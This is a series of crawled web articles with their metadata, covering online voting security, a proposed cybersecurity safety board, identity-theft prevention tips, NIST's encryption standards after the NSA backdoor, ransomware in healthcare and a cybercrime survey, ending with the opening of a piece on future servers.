Even if a system of secure ID cards and compatible web access devices were to be implemented, there is still a substantial challenge in securing the portals used to collect votes. Not only would the servers need to be physically secured, the software necessary to tabulate the votes would have to be bulletproof. Given that flexibility for the portals would be a universal demand, and that the agencies which perform the voting collection have insufficient resources to secure the portals, massive fraud is almost guaranteed – by internal and external perpetrators alike.
For those of us familiar with the promise and perils of online technologies, it’s clear that these tools are effective in sharing information and can serve well in soliciting input for the government. However, when it comes to collecting votes the balance between security and convenience means that our current system of voting by physical presence is the only real choice.
Why We’re Not Ready for Online Voting
And, it could be many years before online voting becomes reality because:
- Universal citizen ID cards are a political third rail given our desire for personal privacy and the inevitable association that these cards have with WWII Gestapo agents demanding to see citizens’ personal papers.
- Even if universal citizen IDs became politically acceptable, we currently lack the resources to create the IT infrastructure needed for secure, real-time electronic voter data collection.
Given these realities, it appears that online voting is one area that’s not quite ready to benefit from the boundless potential of technology. For now, at least, it seems paper ballots and our physical presence provide the most tamperproof solution for our participatory democracy. | <urn:uuid:1f6dd7c9-1ff8-40f6-bb23-519e9d979220> | CC-MAIN-2017-04 | http://www.identityweek.com/not-ready-for-online-voting/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00032-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942396 | 591 | 2.8125 | 3 |
In his book The Psychological Edge: Strategies For Everyday Living, clinical psychologist Dr. Samuel Shein writes that while we have a National Transportation Safety Board (NTSB), there is no National Psychological Research Board (NPRB). A group like the NPRB could investigate national disasters caused by those with psychological issues.
Even with tragedies such as the Columbine High School and Sandy Hook Elementary School massacres, to the Heaven's Gate mass suicide, 9/11 and more; the US still lacks a central agency that deals with psychological-based tragedies. Creating a NPRB could be crucial to avoid future tragedies and senseless deaths.
With regards to information security, the Sony breach of 2014 shows that the time has arrived to create a National Cybersecurity Safety Board (NCSB). The debacle of the FBI prematurely attributing the attack to the North Korean government is still causing embarrassment, especially to information security professionals who note that attribution, and determination of root cause and probable cause, takes time to determine.
As for the NTSB, in 1967, Congress established the NTSB as an independent agency placed within the Department of Transportation (DOT). Based on that, the NCSB would likely be placed within the Department of Commerce, Federal Trade Commission or most likely the Department of Homeland Security.
In creating the NTSB, Congress envisioned that a single organization with a clearly defined mission could more effectively promote a higher level of safety in the transportation system than the individual modal agencies working separately.
In 2000, the NTSB embarked on a major initiative to increase employee technical skills and make its investigative expertise more widely available to the transportation community by establishing the NTSB Academy at George Washington University. To date, it has issued over 13,000 safety recommendations to more than 2,500 recipients.
Based on the success of the NTSB, I think a NCSB that could perform similar tasks when it comes to information security. Transportation disasters and security breaches have many parallels, and by having a body to investigate information security breaches and advise on security safety, the entire industry would benefit.
What would a NCSB look like? As a start, when an investigation of a major breach would occur, there would be a NCSB go team comprised of specialists in fields. The go team would include experts in the following areas: malware, digital forensics, application security, network security, network infrastructure, operating systems and more. They would work in concert with the breached organizations and affected vendors.
Like the NTSB, the NCSB would determine if it needs to hold a public hearing on the breach. After all that is done, it would publish a final report and issue security recommendations. Like the NTSB, the NCSB would likely not have any legal authority to implement, or impose, its recommendations. That burden would fall upon regulators at either the federal or state level.
The NTSB also has a Most Wanted List, which represents the agencies’ advocacy priorities, designed to increase awareness of, and support for, the most critical changes needed to reduce transportation accidents and save lives. The NCSB would also issue its annual cybersecurity most wanted list.
Creating the NCSB in the model of the NTSB would be a benefit to every US organization. After megabreaches at Anthem, Heartland Payment Systems, Evernote, TJX, Target, Home Depot, Sony and much more; it still leaves us in early 2015 at a standstill, when it comes to breach information sharing, cause determination and proposed recommendations.
Creating a NCSB is an idea whose time has come. If it does get created, it will be a crucial step in the growth and maturity of information security.
Ben Rothke CISSP is with Nettitude and the author of Computer Security: 20 Things Every Employee Should Know. | <urn:uuid:834a3df3-2a6a-4def-b141-9b783287322c> | CC-MAIN-2017-04 | http://www.csoonline.com/article/2886326/security-awareness/it-s-time-for-a-national-cybersecurity-safety-board-ncsb.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280850.30/warc/CC-MAIN-20170116095120-00060-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951004 | 773 | 2.8125 | 3 |
Identity thieves use a varied array of methods to get their hands on your personal information. To prevent identity theft, follow these simple guidelines:
Protect your online privacy
The internet has become the primary target of modern day identity thieves. While you can’t stop a data breach at a bank or retailer that affects thousands of customers, you can take a few steps to beef up your individual online security to keep thieves at bay. Whenever you input personal information into a form online, always check that the web page is encrypted with HTTPS and has an authorized certificate. The “https” will prepend the URL of the site shown at the top of your browser. Invest in other protections as well, such as an antivirus and a VPN. These prevent viruses and snoops from monitoring and collecting your activity. To help you out, we made a big list of free tools you can use to protect your privacy.
Avoid phishing scams
Ignore any unsolicited requests for your personal information, whether they come by mail, email, or some other medium. These scams will attempt to lure you in with some sort of promotional offer, or attempt to scare you into giving up information by telling you that your assets are at risk. Remember that reputable companies will never ask you for your social security number, card numbers, or other personal info over the phone or by mail.
Guard your social security number
Don’t carry around your social security card or any documents containing your social security number. The same goes for your National Insurance number if you’re a UK citizen and social insurance number for Canadians. Keep it and other vital documents locked and hidden somewhere safe. Don’t give out your number unless absolutely necessary and you 100 percent trust in the entity receiving it. Your social security/national insurance/social insurance number is the most critical piece of private information you have, so guard it well.
Monitor your accounts for unauthorized transactions
Compare receipts with your account statements to make sure everything matches. If you use online banking, check your account activity often for unauthorized or fraudulent purchases, withdrawals, and transfers. Pay close attention to billing cycles as well. If your credit card bill arrives late, for instance, a thief could have changed your address without your knowledge, then forwarded you the bill after tampering with it. If a bill is late, contact the original sender to inquire about why.
Shred mail and paperwork with identifying information
Don’t throw paperwork, bills, and mail with your information in it into the trash without first shredding or otherwise destroying it. Dumpster diving is a classic tactic used by identity thieves to steal info. While we’re at it, make sure to collect your mail promptly and don’t let it sit in your mailbox for a long period of time. Have a trusted neighbor collect your mail on your behalf if you leave for an extended period of time to prevent thieves rifling through your mailbox.
Create strong passwords
“123456” and “password” don’t cut it when it comes to online passwords. The longer the password, the better. Include numbers and symbols as well to prevent computer programs from brute forcing your account–essentially guessing every possible combination until the correct string of characters is correct. Don’t use the same passwords for every website. Consider using a password manager app so you can make passwords unique without having to memorize them. Read more about creating strong passwords in our guide.
Be wary of shoulder surfers and skimmers
Whenever you use an ATM or keypad at a cash register, keep an eye out for people who try to sneak a peek at your PIN. Cover the keypad with your other hand. Be wary of skimmers: devices that scan your card’s magnetic strip. Skimmers can be fixed onto ATMs to make it look as though they are part of the original machine, or used by store clerks and waiters to swipe your card a second time when you’re not looking. If possible, upgrade to bank and credit cards with chips instead of just magnetic strips.
Order your credit report once per year
Under US law, citizens are entitled to one free credit report per year from each of the national credit bureaus. Check these reports for any accounts you did not open and other discrepancies. Once your credit has been tarnished, it can be very difficult to mend it.
UK citizens don’t get free credit reports, but credit reporting agencies often offer free trials that you can avail of or only require you pay postage to receive a hard copy.
Canadians can get their credit reports free in the mail, but the process takes two to three weeks. If you want instant online access, that will cost extra.
Invest in identity theft protection
Several companies offer subscription services that will monitor your accounts, help restore your identity, and provide insurance to compensate for damages as a result of identity theft. Learn more about identity theft protection and read our reviews of these services on Comparitech. Most of our reviews are for US-only providers now as this is where commercial identity theft protection is most popular, but we hope to add more international options in the future. US citizens can checkout or list of the best identity theft protection services here.
“Suit of Armor” by Erik Drost licensed under CC BY 2.0 | <urn:uuid:91c775f5-2b1e-4be1-9f2d-5ca4408d778c> | CC-MAIN-2017-04 | https://www.comparitech.com/identity-theft-protection/guides/how-to-protect-yourself-from-identity-theft/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281746.82/warc/CC-MAIN-20170116095121-00454-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.92193 | 1,097 | 2.65625 | 3 |
NIST's future without the NSA
Will the National Institute of Standards and Technology break its close relationship with the National Security Agency in developing cryptographic and cybersecurity standards? That seems very likely following a recent report by an outside panel of experts, and it will have implications for federal agencies.
The report by the Visiting Committee on Advanced Technology (VCAT), which was released July 14, came after last year’s revelation as a part of the Edward Snowden leaks that the NSA had inserted a “backdoor” into a NIST encryption standard that’s used to generate random numbers. NIST Special Publication 800-90A, the latest version published in 2012, describes ways for generating random bits using a deterministic random bit generator (DRBG). That’s an important step for many of the cryptographic processes used to secure computer systems and protect data.
The backdoor allowed the NSA to basically circumvent the security of any system it wanted to get data from, and that could be a substantial number. The DRBG was used as the default in RSA’s FIPS 140-2 validated BSAFE cryptographic library, for example, before that was ended in 2013. Up until then, BSAFE had been widely used by both industry and government to secure data.
The main damage done by these revelations is not in whatever data the NSA managed to extract because of this, but in the confidence organizations will have in what NIST does in cybersecurity going forward. And for government agencies that’s critical, since they are required by law to adhere to the standards NIST puts out.
NIST removed the offending DRBG algorithm from 800-90A in April and reissued the standard. It advised federal agencies to ask vendors whose products they used if their cryptographic modules rely on DRBG and, if so, to ask them to reconfigure those products to use alternative algorithms.
But the damage has been done. Not only do other NIST standards developed in coordination with the NSA now need critical review, according to VCAT committee member Ron Rivest, a professor at MIT, but the process for developing future standards needs reassessment and reformulation.”
As Edward Felten, a professor of computer science and public affairs at Princeton University and another of the VCAT members, wrote in the committee’s report, if government has to conform to NIST standards, but everyone else uses something different, it “would be worse for everybody and would prevent government agencies from using commercial off-the-shelf technologies and frustrate interoperation between government and non-government systems.”
Simply put, that’s not possible. Government is no longer in the position of being able to develop systems for its own use and depends absolutely on commercial products. So, the scramble to shore up NIST’s reputation is on.
NIST says it has already instituted processes to strengthen oversight of its standards making, and could make more along the lines of the recommendations made in the VCAT report. Congress got in on the act a few months ago with an amendment to the FIRST Act, a bill to support science and research, that strips the requirement in law that NIST consult with the NSA when developing information security standards.
However, it still allows NIST to voluntarily consult with the NSA, something the VCAT report also goes to some lengths to recommend. That’s a tacit admission that NIST and the government overall can’t do away with NSA input on security. There have been suggestions that the NSA’s role in information assurance should be given over the Department of Homeland Security or the Defense Department, but that seems unlikely.
The fact is that the NSA probably has the greatest depth of expertise in cryptography and security in the entire government, and both the DHS and DOD rely on it as much as NIST does. How to reconcile all of that while urgently repairing the trust that’s needed of NIST and its standards, both in government and industry, will be one of the more fascinating things to watch over the next few years.
Posted by Brian Robinson on Jul 18, 2014 at 10:22 AM | <urn:uuid:9cdb02d9-a3ec-4e9a-9a24-d9e926424548> | CC-MAIN-2017-04 | https://gcn.com/blogs/cybereye/2014/07/nist-nsa-encryption.aspx?admgarea=TC_SecCybersSec | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280718.7/warc/CC-MAIN-20170116095120-00574-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.959042 | 846 | 2.546875 | 3 |
One of the biggest stories in the IT security world in February was that of the ransomware attack on a Los Angeles hospital that reportedly had doctors and other healthcare personnel locked out of patients’ records and unable to even communicate via email for over a week. This incident highlights a growing – and scary – trend in the escalation of cybercriminals’ money-motivated attacks that formerly targeted individual computer users but is now aiming higher, at businesses and institutions whose records are so vital they may be compelled to pay whatever the attackers demand for their release.
The practice of seizing someone or something and demanding that those who want the person or item back pay for it is an age-old type of extortion. The payment is known as ransom, which comes from the old French word rançon and means “buying back.”
Hostage-taking for ransom has a long and colorful history. Julius Caesar was said to have been kidnapped and held for ransom by pirates at the age of twenty-five. True to form, when he found out the pirates were asking for 20 talents of silver to release him, he declared himself worth more and had them up the ransom to 50 talents. John Paul Getty’s sixteen-year-old grandson was held for ransom by an Italian gang in 1973 and his ear cut off and mailed to the press. He was released after payment of $3 million. The 20-month-old baby of Charles Lindbergh was kidnapped in 1932. Despite 13 ransom notes and the payment of ransom, the baby’s body was found a few miles from the family’s home and a long-running FBI investigation resulted in the arrest, trial and execution of Bruno Richard Hauptmann.
Kidnapping humans is a difficult undertaking. In our digital age, there’s an easier way for criminals to extort money from individuals and companies: they can take our precious data hostage or hold our entire networks hostage. They do this by means of malicious software known as ransomware, and some very smart people are falling victim to it.
As the “computer experts” and unofficial tech support for almost everyone we know, my husband and I have had multiple friends and family members contact us with the frantic news that all their data has been rendered inaccessible and they’re getting messages telling them they have to pay to unlock it. Some of these are highly educated folks whom you wouldn’t expect to fall for a con job – yet they’ve paid the ransom, only to discover that as with the Lindbergh kidnapper, criminals often don’t keep their end of the bargain.
Ransomware has been around for at least a quarter of a century and started to proliferate around 2005-2006. Some of the first variants were simple “scareware” but the attackers haven’t gotten more serious, and today’s CryptoWall and CryptoLocker are a good deal more sophisticated – and harder to crack – than the early attempts. Modern ransomware comes in a variety of types but the common factor is that they all prevent you from doing what you want to do on your computer unless you do what the malware demands (which may be sending money – usually in the form of bitcoins – or can be as innocuous as filling out surveys).
One thing that makes ransomware so prevalent is that it can sneak up on a system in many different ways: some infestations are accomplished via botnets, and many utilize the good old tried-and-true methods of email links and attachments and social engineering tactics. Ransomware can be spread through messenger/chat programs or even via infected USB thumb drives and other removable media. An especially popular method for modern attackers is to distribute the payload through “drive-by” downloads and “malvertising” (malicious advertising). While safe surfing habits are always advised, even those who are diligent may still get caught in the ransomware net since any website that accepts user-uploaded content can be compromised and used to pass along the malware, including legitimate popular sites. Think you’re safe because you use a Mac? Think again.
Some ransomware programs will just encrypt your data. If you have backups of the data (that haven’t been overwritten with encrypted copies), you might luck out. Other types of ransomware will lock up your computer and prevent you from accessing the operating system and/or your applications. The more sophisticated ransomware can hide itself from anti-malware software to avoid detection.
It’s bad enough when Aunt Mary finds that all 8,250 photos of the grandkids she had stored on her hard drive are no longer accessible (and of course those were the only copies). It’s worse when your best friend calls you in desperation because all his tax files have been encrypted and when he restored his backup, that external drive got infected, too. But none of that compares to the havoc that ransomware can wreak when it attacks an organization that relies on its computer systems and data for life-and-death decision-making, such as those in the healthcare industry.
Hollywood Presbyterian Medical Center was the victim of such an attack last month, and the digital hostage-takers shut down access to the hospital’s computer systems and then wanted $3.6 million to let it go. The institution ended up paying, although reportedly much less than the original demand. There were also reports that some patients in the hospital’s emergency room were sent to other hospitals because HPMC was unable to register them or access their medical records.
This case ended up getting a great deal of publicity, but some experts speculate that it was by no means an isolated incident. Obviously no organization – whether a public entity, private company or non-profit – wants it splashed all over the Internet that they have been victimized in this way. It’s embarrassing, it can cause customers to lose confidence in them, and it could subject them to scrutiny regarding whether they did all they could have to prevent it, especially in a regulated industry such as those that fall under HIPAA laws. In the U.S., HIPAA violations are a very big deal that can result in both civil and criminal penalties.
Ransomware is just one of the many times of breaches that can impact hospitals, doctors’ offices, labs and other healthcare-related businesses. According to Travis Greene writing in SecurityWeek last summer, from 2014 to 2015 security breaches in the healthcare arena increased by 60 percent and the cost of a healthcare industry breach went up by a whopping 282 percent. The Ponemon Institute’s data showed that as of last October, criminal attacks in healthcare had become the leading cause of data breaches.
Technological innovations have been responsible for “medical miracles” and new cutting-edge tech such as artificial intelligence (AI) and 3D printing are revolutionizing healthcare. The computerization of medical records can cut costs for storing huge amounts of information and make it orders of magnitude easier for physicians to have patients’ medical histories, medication information and other relevant data at their fingertips in order to more quickly formulate a better treatment plan. However, when those records are stored on a networked computer or NAS or SAN, it also exposes this very personal information to the risk of unauthorized access or worse, tampering that could put lives in danger.
In addition to making medical records inaccessible and thus possibly delaying life-saving treatment, attackers could make changes to prescription dosages, erase or change patient histories to omit or add information that causes an incorrect diagnosis or prognosis, make a person’s illnesses public in order to cause embarrassment (such as in the case of sexually transmitted diseases) or affect the person’s career (such as a revelation of past psychiatric treatment of a person running for political office). Cybercriminals can also sell stolen medical records, which the FBI warned a couple of years ago are even more valuable than credit card information on the black market.
That’s why cybersecurity should be a top priority for all IT departments and data centers that serve the healthcare field. Strong encryption and multi-factor authentication, along with strict audit trails, should be standard in the healthcare IT world. But a convergence of technological trends and innovations makes securing healthcare data more complicated than that.
When we think of the Internet of Things (IoT) and the security issues it brings, many of us just think of household appliances and perhaps smart watches, IP cameras, Internet-enabled TVs and connected cars. However, there are a myriad of specialized medical devices that now connect to the Internet and thus are vulnerable to remote access and hack attacks, or, as the Washington Post put it, The Internet of Things that Can Kill You. These range from pacemakers inside heart patients’ chests to infusion pumps that deliver insulin or narcotics to robotic arms that can be used to perform surgery remotely.
Not only could these devices be hacked to directly harm the patients who are using them, but because they’re often connected to hospital networks, they could be used as a back door to gain access to the entire network if there are vulnerabilities in the software and/or they’re not configured properly – and as we’ve discussed before, many of the “things” that are becoming Internet-capable are made by vendors whose expertise lies in the primary purpose of the device and not in cybersecurity. Many embedded devices aren’t updated regularly so vulnerabilities don’t get patched, and the fierce competition (and big profits to be made) in this space may lead manufacturers to rush to get their devices on the market before they’ve been thoroughly secured.
No wonder some security experts declared that 2015 was the “year of the healthcare hack,” with studies showing that healthcare and pharmaceutical companies have the worst cybersecurity record among the S&P 500. But in 2015, healthcare hackers (and hostage-takers) were just getting started. If the industry doesn’t make a concerted effort to focus on security now, 2016 could be even worse. | <urn:uuid:3bae4e42-536b-4433-8416-d52ea145b37c> | CC-MAIN-2017-04 | https://techtalk.gfi.com/holding-healthcare-hostage-the-state-of-security-in-the-medical-industry/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00142-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963929 | 2,056 | 2.53125 | 3 |
Jenny learned to watch for warning signs during her pregnancy by studying her family health history. Jane launched a personal healthy living campaign when she realized she couldn't "wish" herself healthy. Like Jane and Jenny, thousands more Utahns have health stories that highlight their hopes, strengths, and struggles. Now, there is a place online where all those stories can be shared: http://health.utah.gov/bhp/sb/.
The Utah Health Story Bank project is led by the Utah Department of Health (UDOH) Bureau of Health Promotion (BHP). BHP programs are responsible for health education campaigns focusing on prevention and control of chronic diseases like diabetes, heart disease and obesity. Health professionals know that shared experiences can be valuable tools in convincing people to make changes in their personal health behavior.
"We're very happy to be launching this innovative tool," says Heather Borski, BHP director. "It gives Utahns an opportunity to share their health stories, and their stories will help us demonstrate to others the important, tangible and personal impacts of our programs."
Those who'd like to share stories can go to the UDOH Web site (http://health.utah.gov) and click on the 'Utah Health Story Bank' icon. Once at the story bank, they can register and then submit their story. All stories will be kept confidential and will only be shared with the public, legislators, or other health professionals with express permission from the person submitting the story.
Storytelling is a time-tested teaching practice used to share messages and make them memorable. The method has been found effective in a variety of informal and formal settings.
"Few things motivate people to change their lives for the better than success stories from real people, folks they can relate to as fellow human beings," says Dr. David Sundwall, UDOH executive director. "Statistics and scare tactics often don't have the intended impact, but stories from others' lives can make a big difference."
Jenny Johnson of the BHP Genomics program was motivated to start the story bank by her own experience. "We had collected a few stories in the past and used them to teach other Utahns about the importance of knowing their family health histories," said Johnson. "We could have taught people the same thing with lectures and data, but it's only when we put a face on the issue that we find we touch others' lives. We're excited to have this resource and hope Utahns will feel pride in sharing their experiences."
There is no limit on the number of stories a person may submit to the story bank, and one does not have to suffer from heart disease, asthma or another chronic disease to share a health story. One may share his or her experiences with traumatic injury or domestic abuse, as well. All stories will be screened for appropriate language and content. | <urn:uuid:2c7de669-815d-4a21-9529-df54c604fc21> | CC-MAIN-2017-04 | http://www.govtech.com/health/Utah-Department-of-Health-Launches-Online-Story_Bank.html?topic=117677 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00015-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.965871 | 581 | 2.578125 | 3 |
The Asia-Pacific crop protection chemicals market has been estimated at USD 14.4 Billion in 2015 and is projected to reach USD 20.3 Billion by 2020, at a CAGR of 7.13% during the forecast period from 2015 to 2020. Crop protection chemicals also called pesticides constitute a class of agrochemicals that are used to kill plant-harming organisms like pests, weeds, rodents, nematodes etc., and preventing the destruction of crops by them. Any material or mixture that is capable of preventing, destroying, repelling or mitigating a pest can be called pesticide. Herbicides, insecticides, insect growth regulators, nematicides, termiticides, mollusicicdes, piscicides, avicides, rodenticides, predacides, bactericides, insect repellants, animal repellants, antimicrobials, fungicides, disinfectants, sanitizers and their bio counter parts all come under the classification of pesticides.
Pesticides are used in crops as well as non-crop plants like turfs and ornamentals. They can be broadly classified into four groups depending on their usage. Farmers use herbicides for killing unwanted plants called weeds, insecticides for killing insects, fungicides for treating diseases caused by fungus and other pesticides for treating diseases, which are not caused by fungi or insects. Herbicides accounted for more than 53.5% of total pesticides sales in 2015.
Pesticides market is driven by the need to increase crop yield and efficiency. The region’s population is growing rapidly, but the farmlands have been decreasing pushing farmers to increase their yields. New farming practices are adopted by farmers to increase crop yields. Genetically modified (GM) plants have helped farmers increase their yields coupled with the reduction of use in some pesticides. Bio pesticides adoption is also occurring all over the world, especially in developed and some developing countries. Demand for organic and completely natural foods is increasing at a stellar rate and inevitably bio pesticides consumption has to be increased. Pesticides help in optimal usage of resources for plant growth and protect the crop from various pathogens. Some pesticides repel animals coming towards them with the help of pheromones. The usage of generic pesticides in this region is high especially in rapidly growing markets like China and India. These markets are suitable for generic pesticide manufacturers. New farming practices require new crop protection products. The research and development costs are escalating. For previously mentioned reasons, investment for companies is high on new products and they are wary of returns. Per capita usage of pesticides is low in some developing countries because of costs. This poses a threat to companies, as their market reach might not follow desired growth patterns. Shrinking farmlands are also threat in the form of less usage of pesticides. In countries like Japan, pesticides usage is saturated and a reduction in agricultural land will definitely bring down pesticides usage as well.
The market is classified based on the application into herbicides, fungicides, insecticides and other pesticides. They are further segmented depending on their chemical origin: bio pesticides and synthetic pesticides. Diverse pesticides range is used in agriculture and farming. Pesticides are also segmented by their usage in crops like cereals, fruits etc. Non-crop utilization of pesticides in turfs, ornamentals and others is also studied. Market study indicated that Cereals and grains consumed the highest market in the use of pesticides. This can be attributed to the food safety and wide variety of uses of cereals and grains.
The market is also segmented geographically into China, India, Japan, Australia and others. China has the largest consumer base in this region. Australia and Japan followed the list. The rising disposable income levels, rising population and food security have made India, the country with maximum potential for growth. The low affordability and explicit cost cutting measures of farmers in developing countries hinder the real potential of the market.
Decreasing farmlands and increasing population pose a serious threat to food security. Recently, grains are also used to produce bio fuel and this poses a risk to food security especially in developing countries where price drastically influences consumption. Pesticides help to increase farm yields and still have a large scope to improve the overall agricultural production of the world. The major companies in crop protection chemicals are Bayer, BASF, DuPont, Dow agrosciences, Syngenta, Monsanto, UPL etc. The current trend to survive in the market is the research and innovation route for major companies. Lot of small and growing companies are currently using generic pesticides to increase their sales revenue. All major companies are investing profoundly in new product development to keep up with competition to gain market share and increase their revenue. Pesticides were prominent for increased agricultural yields and will remain so in the coming years.
Key Deliverables in the Study | <urn:uuid:c4cb12c4-07fc-4e36-9ba2-3e9f25f9a95f> | CC-MAIN-2017-04 | https://www.mordorintelligence.com/industry-reports/asia-pacific-crop-protection-pesticides-market-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281424.85/warc/CC-MAIN-20170116095121-00501-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954374 | 975 | 3.046875 | 3 |
Health care analytics is an emerging application area that promises to help cut costs and provide better patient outcomes. To reach that goal though requires sophisticated software that can mimic some of the intelligence of real live physicians. At Lund University and Skåne University in Sweden, researchers are attempting to do just that by building a model of heart-transplant recipients and donors to improve survival times.
The so-called “survival model” is designed to discover the optimal matches between recipients and donor for heart transplants. It takes into account such factors as age, blood type (both donor and recipient), weight, gender, age, and time during a transplant when there is no blood flow to the heart. Just analyzing those six variables leads to about 30,000 distinct combinations to track. When you want to match tens of thousands of recipients and donors across that spread of combinations, you need a rather sophisticated software model and some serious computing horsepower.
To build the application, the Lund researchers used MATLAB and a set of related MathWorks libraries, namely the Neural Network Toolbox, the Parallel Computing Toolbox, and the MATLAB Distributed Computing Server. With that, they built their predictive artificial neural network (ANN) models, in this case, a simulation that predicts survival rates for heart transplant patients based on the suitability of the donor match. The ANN models are “trained” using donor and recipient data encapsulated in two databases: the International Society for Heart and Lung Transplantation (ISHLT) registry and the Nordic Thoracic Transplantation Database (NTTD).
The key software technology for the ANN application is MathWorks’ Neural Network Toolbox. The package contains tools for designing and simulating neural networks, which can be used for artificial intelligence-type applications such as pattern recognition, quantum chemistry, speech recognition, game-playing and process control. These types of application don’t lend themselves easily to the type of formal analysis done in traditional computing.
For the ANN models, training involves correlating donor and recipient data, such that the risk factors are weighted accurately. If done correctly, the simulations can become adept at associating these factors with the heart transplant survival rates. In this case, the results from the simulations were used to pick out the best and worst donors for any particular recipient.
The ultimate goal is to determine the mean survival times after transplantation for waiting recipients, so that doctors can make the best possible decision with regard to matches. In the research study, they analyzed about 10,000 patients that had already received transplants in order to verify the accuracy of the algorithms.
What they found was that the ANN models could increase the five-year survival rate raised by 5 to 10 percent compared to the traditional selection criteria performed by practicing physicians. Perhaps more importantly, using a randomized trial based on preliminary results, approximately 20 percent more patients would be considered for transplantation under these models, says Dr. Johan Nilsson, Associate Professor in the Division of Cardiothoracic Surgery at Lund University.
Because of the combinatorial load of the recipient-donor variables, the models are very compute-intensive. On a relative small cluster, the MATLAB-derived ANN simulation took about five days. That was significantly better the open source software packages (R and Python) they started out with. Under that environment, runs took about three to four weeks and were beset with crashes and inaccurate results.
To run the simulation, the researchers used a nine-node Apple Xserve cluster (which includes a head node and a filesharing node), along with 16 TB of disk, all lashed to together with a vanilla GigE network. Memory size on the nodes ranged form 24 to 48 GB. According to Nilsson, with the latest MATLAB configuration, they use 64 CPUs to run the ANN simulation.
Nilsson, who is a physician, programmed the application himself, noting that the MATLAB environment was easy to set up and use, adding there was no need for deep knowledge of parallel computing. The biggest roadblock he encountered was the need to customize an error function (MATLAB Neural Network does not have any cross-entropy error routine.) There were also some problems encountered in setting up the Xserve cluster, but once they replaced Apple’s Xgrid protocol with the MATLAB Distributed Computing Server, many of those problems disappeared.
The Apple Xserve cluster is not exactly state of the art for high performance computing these day. Presumably with a late model HPC setup, they could cut the five-day turnaround time for the simulation even more, which would speed up the research even further.
In the short term, the Lund and Skåne team intend to continue to optimize the software and explore other solutions like regression tree and logistic regression algorithms, as well as add support for vector machines. In parallel, they want to start transitioning the technology into a clinical setting.
According to Nilsson, once they’ve fully cooked the models, they can do away with the high performance computing environment. “In a future clinical setting,” he says, “the application could be used on any desktop computer, and the matching process will take only seconds to a couple of minutes.” | <urn:uuid:02854bd9-715e-47e2-99fd-b56f4f212513> | CC-MAIN-2017-04 | https://www.hpcwire.com/2011/09/13/hpc_bests_physicians_in_matching_heart_transplant_donors_and_recipients/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00409-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943311 | 1,073 | 3.03125 | 3 |
A new Norton Study of 7,000 Web Users Is First to Gauge Emotional Impact of Cybercrime; Victims Feel Ripped Off ... and Pissed Off .
Two-thirds (65 percent) of Internet users globally, and almost three-quarters (73 percent) of U.S. Web surfers have fallen victim to cyber-crimes, including computer viruses, online credit card fraud and identity theft.
As the most victimized nations, America ranks third, after China (83 percent) and Brazil and India (tie 76 percent). That victims' strongest reactions are feeling angry (58 percent), annoyed (51 percent) and cheated (40 percent), and in many cases they blame themselves for being attacked.
Only 3 percent don't think it will happen to them, and nearly 80 percent do not expect cyber-criminals to be brought to justice- resulting in an ironic reluctance to take action and a sense of helplessness...
Relating to that - US White Housepublished a Draft on "National Strategy for Trusted Identities in Cyberspace Creating Options for Enhanced Online Security and Privacy".
Few quotes from this document:
"Cyberspace - the interdependent network of information technology components that underpins many of our communications - is a crucial component of the Nation's critical infrastructure. We use cyberspace to exchange information, buy and sell products and services, and enable many online transactions across a wide range of sectors, both nationally and internationally. As a result, a secure cyberspace is critical to the health of our economy and to the security of our Nation. In particular, the Federal Government must address the recent and alarming rise in online fraud, identity theft, and misuse of information online."
The Strategy's vision is:
Individuals and organizations utilize secure, efficient, easy-to-use, and interoperable:
Identity solutions to access online services in a manner that promotes confidence, privacy,choice, and innovation.
Fraudulent transactions within the banking, retail, and other sectors along with intrusions against the Nation's critical infrastructure assets that are essential to the functioning of our society and economy (utilities, transportation, financial, etc.) are all too common.
As more commercial and government services become available online, the amount of sensitive and financial data transmitted over the Internet is ever increasing.
Consequently, the probability of loss associated with data theft and corruption, fraud, and privacy breaches increases as well. The poor identification, authentication, and authorization practices associated with these identity solutions are the focus of this Strategy.
Identity Solutions will be Secure and Resilient:
Securing identity solutions against attack or misuse is paramount. Security ensures the confidentiality, integrity, and availability of identity solutions: Strong cryptography, the use of open and well-vetted security standards, and the presence of auditable security processes are critical to the trustworthiness of an identity solution.
Identity solutions should have security built into them such that they detect and prevent intrusions, corruption, and disruption to the maximum extent possible.
Identity solutions should be resilient, able to recover and adapt to drastic or abrupt change. Identity Solutions will be Cost-Effective and Easy To Use. Identity solutions should be simple to understand, intuitive, easy to use, and enabled by technology that requires minimal user training."
I have submitted my proposal to this initiative at : http://www.nstic.ideascale.com/a/dtd/Protecting-Online-Transactions-and-Sensitive-Data-Files-with-Malware-resilient-Software-as-a-Service./45573-9351
Your comments are welcome. | <urn:uuid:e69176b1-31c6-4119-bbb4-fcff78caa3ac> | CC-MAIN-2017-04 | http://www.infosecisland.com/blogview/8042-Cybercrime-Victims-Feel-Ripped-Off.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00317-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.900854 | 749 | 2.515625 | 3 |
Future Systems: What Will Tomorrow’s Server Look Like?
February 4, 2016 Timothy Prickett Morgan
We can talk about storage and networking as much as we want, and about how the gravity of data bends infrastructure to its needs, but the server – or a collection of them loosely or tightly coupled – is still the real center of the datacenter.
Data is useless unless you process it, after all. As more than a few companies that have built data lakes as a knee jerk reaction have come to realize.
